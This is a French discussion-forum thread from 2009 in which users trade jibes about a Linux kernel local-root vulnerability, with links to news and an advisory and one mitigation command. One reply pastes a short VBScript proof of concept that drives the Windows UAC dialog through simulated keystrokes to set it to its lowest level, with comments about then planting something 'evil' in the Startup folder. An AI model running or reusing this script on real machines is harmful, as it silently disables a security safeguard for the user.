ENORME VULNERABILITE dans LINUX

Le
P4nd1-P4nd4
C'est cool, on peut tous devenir root

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

Et on peut même pas patcher



AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !

Qui peut encore imaginer utilsier un truc pareil !

(Access root complete. All roots runing perfectly)

--
P4nd1-P4nd4 vous salue, et annonce que le petit ourson possède
désormais son blog
p4nd1-p4nd4.over-blog.com
Vidéos High-Tech et Jeu Vidéo
Téléchargements
Vos réponses
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
leeed
Le #20486241
Le 04-11-2009, P4nd1-P4nd4 <P4nd1-P4nd4@> a écrit :
C'est cool, on peut tous devenir root

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

Et on peut même pas patcher



AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !

Qui peut encore imaginer utilsier un truc pareil !

(Access root complete. All roots runing perfectly)




"He's running a setuid program that allows the user to specify its own
modules. And then you people are surprised he gets local root"

"local root exploit"

What else?
Kevin Denis
Le #20486361
Le 04-11-2009, leeed
http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/



What else?



Au hasard, par exemple:
echo 4096 > /proc/sys/vm/mmap_min_addr

Mais comme on l'a tous fait depuis quelques mois, je ne comprends pas bien
le fait de ressortir du réchauffé comme ça..
--
Kevin
debug this fifo
Le #20486351
Kevin Denis wrote:

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/







Au hasard, par exemple:
echo 4096 > /proc/sys/vm/mmap_min_addr



mais :

"What's more, many administrators are forced to disable the
feature so their systems can run developer tools or desktop
environments such as Wine."

comme d'habitude, c'est encore cette saloperie de windows
qui vient mettre la grouille..
remy
Le #20486341
P4nd1-P4nd4 a écrit :
C'est cool, on peut tous devenir root

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

Et on peut même pas patcher




https://rhn.redhat.com/cve/CVE-2009-3547.html

AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !

Qui peut encore imaginer utilsier un truc pareil !

(Access root complete. All roots runing perfectly)





--
http://remyaumeunier.chez-alice.fr/
debug this fifo
Le #20486651
P4nd1-P4nd4 wrote:

AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !




http://www.sophos.com/blogs/chetw/g/2009/11/03/windows-7-vulnerable
t'as quoi a repondre, la ?
Dellara
Le #20487501
P4nd1-P4nd4 09:40 AM:

AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !


Débile profond!
NiKo
Le #20489781
P4nd1-P4nd4 a écrit :
C'est cool, on peut tous devenir root

http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

Et on peut même pas patcher



AHAHAHAHHAHHAAAAAHAAAHAAAAAAHAAA HOOHOOOOOOOOHHHHOOO HUUUHUUUuuuHU !

Qui peut encore imaginer utilsier un truc pareil !

(Access root complete. All roots runing perfectly)




Tu veux parler de celle la ?

'// 1337H4x Written by _____________
'// (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"
Publicité
Poster une réponse
Anonyme